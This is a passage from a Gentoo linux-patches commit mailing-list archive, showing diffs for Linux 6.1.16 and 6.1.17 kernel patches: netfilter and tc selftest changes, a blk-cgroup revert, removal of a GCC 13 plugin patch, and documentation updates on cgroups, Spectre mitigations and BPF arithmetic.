+ 	netns_ping "$ns1" -I v0 192.168.42.1 && \
+@@ -120,9 +134,13 @@ testrun() {
+ 
+ 	ipt_zero_rule "$iptables" || die "iptables matched martian"
+ 	ipt_zero_rule "$ip6tables" || die "ip6tables matched martian"
++	ipt_zero_reverse_rule "$iptables" && die "iptables not matched martian"
++	ipt_zero_reverse_rule "$ip6tables" && die "ip6tables not matched martian"
+ 	nft_zero_rule ip || die "nft IPv4 matched martian"
+ 	nft_zero_rule ip6 || die "nft IPv6 matched martian"
+ 
++	clear_counters
++
+ 	# test 2: rpfilter match should pass for regular traffic
+ 	netns_ping "$ns1" 192.168.23.1 || \
+ 		die "regular ping 192.168.23.1 failed"
+@@ -131,6 +149,8 @@ testrun() {
+ 
+ 	ipt_zero_rule "$iptables" && die "iptables match not effective"
+ 	ipt_zero_rule "$ip6tables" && die "ip6tables match not effective"
++	ipt_zero_reverse_rule "$iptables" || die "iptables match over-effective"
++	ipt_zero_reverse_rule "$ip6tables" || die "ip6tables match over-effective"
+ 	nft_zero_rule ip && die "nft IPv4 match not effective"
+ 	nft_zero_rule ip6 && die "nft IPv6 match not effective"
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json b/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json
+deleted file mode 100644
+index 44901db703764..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json
++++ /dev/null
+@@ -1,227 +0,0 @@
+-[
+-    {
+-        "id": "8293",
+-        "name": "Add tcindex filter with default action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref 1 tcindex chain 0 handle 0x0001 classid 1:1",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "7281",
+-        "name": "Add tcindex filter with hash size and pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 fall_through classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "b294",
+-        "name": "Add tcindex filter with mask shift and reclassify action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action reclassify",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action reclassify",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "0532",
+-        "name": "Add tcindex filter with pass_on and continue actions",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 pass_on classid 1:1 action continue",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action continue",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "d473",
+-        "name": "Add tcindex filter with pipe action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action pipe",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action pipe",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2940",
+-        "name": "Add tcindex filter with miltiple actions",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 7 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action skbedit mark 7 pipe action gact drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 7 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref 7 tcindex.*handle 0x0001.*action.*skbedit.*mark 7 pipe.*action.*gact action drop",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "1893",
+-        "name": "List tcindex filters",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1",
+-            "$TC filter add dev $DEV1 parent ffff: handle 2 protocol ip prio 1 tcindex classid 1:1"
+-        ],
+-        "cmdUnderTest": "$TC filter show dev $DEV1 parent ffff:",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "handle 0x000[0-9]+ classid 1:1",
+-        "matchCount": "2",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2041",
+-        "name": "Change tcindex filter with pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter change dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "9203",
+-        "name": "Replace tcindex filter with pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter replace dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "7957",
+-        "name": "Delete tcindex filter with drop action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter del dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action drop",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    }
+-]


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-11 11:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-11 11:19 UTC (permalink / raw
  To: gentoo-commits

commit:     9399b06afe40f694ceac26c67c236144f76a5274
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Mar 11 11:19:31 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Mar 11 11:19:31 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9399b06a

Linux patch 6.1.17

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 ++
 1016_linux-6.1.17.patch | 123 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 127 insertions(+)

diff --git a/0000_README b/0000_README
index aab72b3b..e2811191 100644
--- a/0000_README
+++ b/0000_README
@@ -107,6 +107,10 @@ Patch:  1015_linux-6.1.16.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.16
 
+Patch:  1016_linux-6.1.17.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.17
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1016_linux-6.1.17.patch b/1016_linux-6.1.17.patch
new file mode 100644
index 00000000..fb9f6cec
--- /dev/null
+++ b/1016_linux-6.1.17.patch
@@ -0,0 +1,123 @@
+diff --git a/Makefile b/Makefile
+index 5ac6895229e9c..db482a420dcaf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 16
++SUBLEVEL = 17
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index f8b21bead6552..7c91d9195da8d 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -87,32 +87,14 @@ static void blkg_free_workfn(struct work_struct *work)
+ {
+ 	struct blkcg_gq *blkg = container_of(work, struct blkcg_gq,
+ 					     free_work);
+-	struct request_queue *q = blkg->q;
+ 	int i;
+ 
+-	/*
+-	 * pd_free_fn() can also be called from blkcg_deactivate_policy(),
+-	 * in order to make sure pd_free_fn() is called in order, the deletion
+-	 * of the list blkg->q_node is delayed to here from blkg_destroy(), and
+-	 * blkcg_mutex is used to synchronize blkg_free_workfn() and
+-	 * blkcg_deactivate_policy().
+-	 */
+-	if (q)
+-		mutex_lock(&q->blkcg_mutex);
+-
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++)
+ 		if (blkg->pd[i])
+ 			blkcg_policy[i]->pd_free_fn(blkg->pd[i]);
+ 
+-	if (blkg->parent)
+-		blkg_put(blkg->parent);
+-
+-	if (q) {
+-		list_del_init(&blkg->q_node);
+-		mutex_unlock(&q->blkcg_mutex);
+-		blk_put_queue(q);
+-	}
+-
++	if (blkg->q)
++		blk_put_queue(blkg->q);
+ 	free_percpu(blkg->iostat_cpu);
+ 	percpu_ref_exit(&blkg->refcnt);
+ 	kfree(blkg);
+@@ -145,6 +127,8 @@ static void __blkg_release(struct rcu_head *rcu)
+ 
+ 	/* release the blkcg and parent blkg refs this blkg has been holding */
+ 	css_put(&blkg->blkcg->css);
++	if (blkg->parent)
++		blkg_put(blkg->parent);
+ 	blkg_free(blkg);
+ }
+ 
+@@ -441,14 +425,9 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	lockdep_assert_held(&blkg->q->queue_lock);
+ 	lockdep_assert_held(&blkcg->lock);
+ 
+-	/*
+-	 * blkg stays on the queue list until blkg_free_workfn(), see details in
+-	 * blkg_free_workfn(), hence this function can be called from
+-	 * blkcg_destroy_blkgs() first and again from blkg_destroy_all() before
+-	 * blkg_free_workfn().
+-	 */
+-	if (hlist_unhashed(&blkg->blkcg_node))
+-		return;
++	/* Something wrong if we are trying to remove same group twice */
++	WARN_ON_ONCE(list_empty(&blkg->q_node));
++	WARN_ON_ONCE(hlist_unhashed(&blkg->blkcg_node));
+ 
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++) {
+ 		struct blkcg_policy *pol = blkcg_policy[i];
+@@ -460,6 +439,7 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	blkg->online = false;
+ 
+ 	radix_tree_delete(&blkcg->blkg_tree, blkg->q->id);
++	list_del_init(&blkg->q_node);
+ 	hlist_del_init_rcu(&blkg->blkcg_node);
+ 
+ 	/*
+@@ -1246,7 +1226,6 @@ int blkcg_init_disk(struct gendisk *disk)
+ 	int ret;
+ 
+ 	INIT_LIST_HEAD(&q->blkg_list);
+-	mutex_init(&q->blkcg_mutex);
+ 
+ 	new_blkg = blkg_alloc(&blkcg_root, disk, GFP_KERNEL);
+ 	if (!new_blkg)
+@@ -1484,7 +1463,6 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	if (queue_is_mq(q))
+ 		blk_mq_freeze_queue(q);
+ 
+-	mutex_lock(&q->blkcg_mutex);
+ 	spin_lock_irq(&q->queue_lock);
+ 
+ 	__clear_bit(pol->plid, q->blkcg_pols);
+@@ -1503,7 +1481,6 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	}
+ 
+ 	spin_unlock_irq(&q->queue_lock);
+-	mutex_unlock(&q->blkcg_mutex);
+ 
+ 	if (queue_is_mq(q))
+ 		blk_mq_unfreeze_queue(q);
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 1680b6e1e5362..891f8cbcd0436 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -487,7 +487,6 @@ struct request_queue {
+ 	DECLARE_BITMAP		(blkcg_pols, BLKCG_MAX_POLS);
+ 	struct blkcg_gq		*root_blkg;
+ 	struct list_head	blkg_list;
+-	struct mutex		blkcg_mutex;
+ #endif
+ 
+ 	struct queue_limits	limits;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-10 12:57 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-10 12:57 UTC (permalink / raw
  To: gentoo-commits

commit:     26d009b2414a6db78ba638c98a35d8fa1874665a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 10 12:57:30 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 10 12:57:30 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=26d009b2

Remove redundant patch

Removed:
2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...rop-std-gnu-plus-plus-to-fix-GCC-13-build.patch | 46 ----------------------
 2 files changed, 50 deletions(-)

diff --git a/0000_README b/0000_README
index f2ba9399..aab72b3b 100644
--- a/0000_README
+++ b/0000_README
@@ -139,10 +139,6 @@ Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
 From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
 Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
 
-Patch:  2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
-From:   https://lore.kernel.org/all/20230201230009.2252783-1-sam@gentoo.org/
-Desc:   gcc-plugins: drop -std=gnu++11 to fix GCC 13 build
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch b/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
deleted file mode 100644
index 55797805..00000000
--- a/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From 5a6b64adc18d9adfb497a529ff004d59b6df151f Mon Sep 17 00:00:00 2001
-From: Sam James <sam@gentoo.org>
-Date: Wed, 1 Feb 2023 23:00:09 +0000
-Subject: gcc-plugins: drop -std=gnu++11 to fix GCC 13 build
-
-The latest GCC 13 snapshot (13.0.1 20230129) gives the following:
-```
-cc1: error: cannot load plugin ./scripts/gcc-plugins/randomize_layout_plugin.so
- :./scripts/gcc-plugins/randomize_layout_plugin.so: undefined symbol: tree_code_type
-```
-
-This ends up being because of https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=b0241ce6e37031
-upstream in GCC which changes the visibility of some types used by the kernel's
-plugin infrastructure like tree_code_type.
-
-After discussion with the GCC folks, we found that the kernel needs to be building
-plugins with the same flags used to build GCC - and GCC defaults to gnu++17
-right now. The minimum GCC version needed to build the kernel is GCC 5.1
-and GCC 5.1 already defaults to gnu++14 anyway, so just drop the flag, as
-all GCCs that could be used to build GCC already default to an acceptable
-version which was >= the version we forced via flags until now.
-
-Bug: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=108634
-Signed-off-by: Sam James <sam@gentoo.org>
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Link: https://lore.kernel.org/r/20230201230009.2252783-1-sam@gentoo.org
----
- scripts/gcc-plugins/Makefile | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/scripts/gcc-plugins/Makefile b/scripts/gcc-plugins/Makefile
-index b34d11e226366..320afd3cf8e82 100644
---- a/scripts/gcc-plugins/Makefile
-+++ b/scripts/gcc-plugins/Makefile
-@@ -29,7 +29,7 @@ GCC_PLUGINS_DIR = $(shell $(CC) -print-file-name=plugin)
- plugin_cxxflags	= -Wp,-MMD,$(depfile) $(KBUILD_HOSTCXXFLAGS) -fPIC \
- 		  -include $(srctree)/include/linux/compiler-version.h \
- 		  -DPLUGIN_VERSION=$(call stringify,$(KERNELVERSION)) \
--		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) -std=gnu++11 \
-+		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) \
- 		  -fno-rtti -fno-exceptions -fasynchronous-unwind-tables \
- 		  -ggdb -Wno-narrowing -Wno-unused-variable \
- 		  -Wno-format-diag
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-10 12:47 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-10 12:47 UTC (permalink / raw
  To: gentoo-commits

commit:     fdfe8d25be63e9e674096f0cdaabe3cc5d6260f3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 10 12:46:56 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 10 12:46:56 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=fdfe8d25

Linux patch 6.1.15

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1015_linux-6.1.16.patch | 32483 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 32487 insertions(+)

diff --git a/0000_README b/0000_README
index 6e5b60b1..f2ba9399 100644
--- a/0000_README
+++ b/0000_README
@@ -103,6 +103,10 @@ Patch:  1014_linux-6.1.15.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.15
 
+Patch:  1015_linux-6.1.16.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.16
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1015_linux-6.1.16.patch b/1015_linux-6.1.16.patch
new file mode 100644
index 00000000..abb8b060
--- /dev/null
+++ b/1015_linux-6.1.16.patch
@@ -0,0 +1,32483 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 5b86245450bdc..2524061836acc 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -86,6 +86,8 @@ Brief summary of control files.
+  memory.swappiness		     set/show swappiness parameter of vmscan
+ 				     (See sysctl's vm.swappiness)
+  memory.move_charge_at_immigrate     set/show controls of moving charges
++                                     This knob is deprecated and shouldn't be
++                                     used.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
+@@ -716,8 +718,15 @@ NOTE2:
+        It is recommended to set the soft limit always below the hard limit,
+        otherwise the hard limit will take precedence.
+ 
+-8. Move charges at task migration
+-=================================
++8. Move charges at task migration (DEPRECATED!)
++===============================================
++
++THIS IS DEPRECATED!
++
++It's expensive and unreliable! It's better practice to launch workload
++tasks directly from inside their target cgroup. Use dedicated workload
++cgroups to allow fine-grained policy adjustments without having to
++move physical pages between control domains.
+ 
+ Users can move charges associated with a task along with task migration, that
+ is, uncharge task's pages from the old cgroup and charge them to the new cgroup.
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index c4dcdb3d0d451..a39bbfe9526b6 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -479,8 +479,16 @@ Spectre variant 2
+    On Intel Skylake-era systems the mitigation covers most, but not all,
+    cases. See :ref:`[3] <spec_ref3>` for more details.
+ 
+-   On CPUs with hardware mitigation for Spectre variant 2 (e.g. Enhanced
+-   IBRS on x86), retpoline is automatically disabled at run time.
++   On CPUs with hardware mitigation for Spectre variant 2 (e.g. IBRS
++   or enhanced IBRS on x86), retpoline is automatically disabled at run time.
++
++   Systems which support enhanced IBRS (eIBRS) enable IBRS protection once at
++   boot, by setting the IBRS bit, and they're automatically protected against
++   Spectre v2 variant attacks, including cross-thread branch target injections
++   on SMT systems (STIBP). In other words, eIBRS enables STIBP too.
++
++   Legacy IBRS systems clear the IBRS bit on exit to userspace and
++   therefore explicitly enable STIBP for that
+ 
+    The retpoline mitigation is turned on by default on vulnerable
+    CPUs. It can be forced on or off by the administrator
+@@ -504,9 +512,12 @@ Spectre variant 2
+    For Spectre variant 2 mitigation, individual user programs
+    can be compiled with return trampolines for indirect branches.
+    This protects them from consuming poisoned entries in the branch
+-   target buffer left by malicious software.  Alternatively, the
+-   programs can disable their indirect branch speculation via prctl()
+-   (See :ref:`Documentation/userspace-api/spec_ctrl.rst <set_spec_ctrl>`).
++   target buffer left by malicious software.
++
++   On legacy IBRS systems, at return to userspace, implicit STIBP is disabled
++   because the kernel clears the IBRS bit. In this case, the userspace programs
++   can disable indirect branch speculation via prctl() (See
++   :ref:`Documentation/userspace-api/spec_ctrl.rst <set_spec_ctrl>`).
+    On x86, this will turn on STIBP to guard against attacks from the
+    sibling thread when the user program is running, and use IBPB to
+    flush the branch target buffer when switching to/from the program.
+diff --git a/Documentation/admin-guide/kdump/gdbmacros.txt b/Documentation/admin-guide/kdump/gdbmacros.txt
+index 82aecdcae8a6c..030de95e3e6b2 100644
+--- a/Documentation/admin-guide/kdump/gdbmacros.txt
++++ b/Documentation/admin-guide/kdump/gdbmacros.txt
+@@ -312,10 +312,10 @@ define dmesg
+ 			set var $prev_flags = $info->flags
+ 		end
+ 
+-		set var $id = ($id + 1) & $id_mask
+ 		if ($id == $end_id)
+ 			loop_break
+ 		end
++		set var $id = ($id + 1) & $id_mask
+ 	end
+ end
+ document dmesg
+diff --git a/Documentation/bpf/instruction-set.rst b/Documentation/bpf/instruction-set.rst
+index 5d798437dad47..3ba6475cfbfc7 100644
+--- a/Documentation/bpf/instruction-set.rst
++++ b/Documentation/bpf/instruction-set.rst
+@@ -99,19 +99,26 @@ code      value  description
+ BPF_ADD   0x00   dst += src
+ BPF_SUB   0x10   dst -= src
+ BPF_MUL   0x20   dst \*= src
+-BPF_DIV   0x30   dst /= src
++BPF_DIV   0x30   dst = (src != 0) ? (dst / src) : 0
+ BPF_OR    0x40   dst \|= src
+ BPF_AND   0x50   dst &= src
+ BPF_LSH   0x60   dst <<= src
+ BPF_RSH   0x70   dst >>= src
+ BPF_NEG   0x80   dst = ~src
+-BPF_MOD   0x90   dst %= src
++BPF_MOD   0x90   dst = (src != 0) ? (dst % src) : dst
+ BPF_XOR   0xa0   dst ^= src
+ BPF_MOV   0xb0   dst = src
+ BPF_ARSH  0xc0   sign extending shift right
+ BPF_END   0xd0   byte swap operations (see `Byte swap instructions`_ below)
+ ========  =====  ==========================================================
+ 
++Underflow and overflow are allowed during arithmetic operations, meaning
++the 64-bit or 32-bit value will wrap. If eBPF program execution would
++result in division by zero, the destination register is instead set to zero.
++If execution would result in modulo by zero, for ``BPF_ALU64`` the value of
++the destination register is unchanged whereas for ``BPF_ALU`` the upper
++32 bits of the destination register are zeroed.
++
+ ``BPF_ADD | BPF_X | BPF_ALU`` means::
+ 
+   dst_reg = (u32) dst_reg + (u32) src_reg;
+@@ -128,6 +135,11 @@ BPF_END   0xd0   byte swap operations (see `Byte swap instructions`_ below)
+ 
+   src_reg = src_reg ^ imm32
+ 
++Also note that the division and modulo operations are unsigned. Thus, for
++``BPF_ALU``, 'imm' is first interpreted as an unsigned 32-bit value, whereas
++for ``BPF_ALU64``, 'imm' is first sign extended to 64 bits and the result
++interpreted as an unsigned 64-bit value. There are no instructions for
++signed division or modulo.
+ 
+ Byte swap instructions
+ ~~~~~~~~~~~~~~~~~~~~~~
+diff --git a/Documentation/dev-tools/gdb-kernel-debugging.rst b/Documentation/dev-tools/gdb-kernel-debugging.rst
+index 8e0f1fe8d17ad..895285c037c72 100644
+--- a/Documentation/dev-tools/gdb-kernel-debugging.rst
++++ b/Documentation/dev-tools/gdb-kernel-debugging.rst
+@@ -39,6 +39,10 @@ Setup
+   this mode. In this case, you should build the kernel with
+   CONFIG_RANDOMIZE_BASE disabled if the architecture supports KASLR.
+ 
++- Build the gdb scripts (required on kernels v5.1 and above)::
++
++    make scripts_gdb
++
+ - Enable the gdb stub of QEMU/KVM, either
+ 
+     - at VM startup time by appending "-s" to the QEMU command line
+diff --git a/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml b/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
+index 63fb02014a56a..117e3db43f84a 100644
+--- a/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
++++ b/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
+@@ -32,7 +32,7 @@ properties:
+       - items:
+           - enum:
+               - mediatek,mt8186-disp-ccorr
+-          - const: mediatek,mt8183-disp-ccorr
++          - const: mediatek,mt8192-disp-ccorr
+ 
+   reg:
+     maxItems: 1
+diff --git a/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml b/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
+index 5b8d59245f82f..b358fd601ed38 100644
+--- a/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
++++ b/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
+@@ -62,7 +62,7 @@ patternProperties:
+         description: phandle of the CPU DAI
+ 
+     patternProperties:
+-      "^codec-[0-9]+$":
++      "^codec(-[0-9]+)?$":
+         type: object
+         additionalProperties: false
+         description: |-
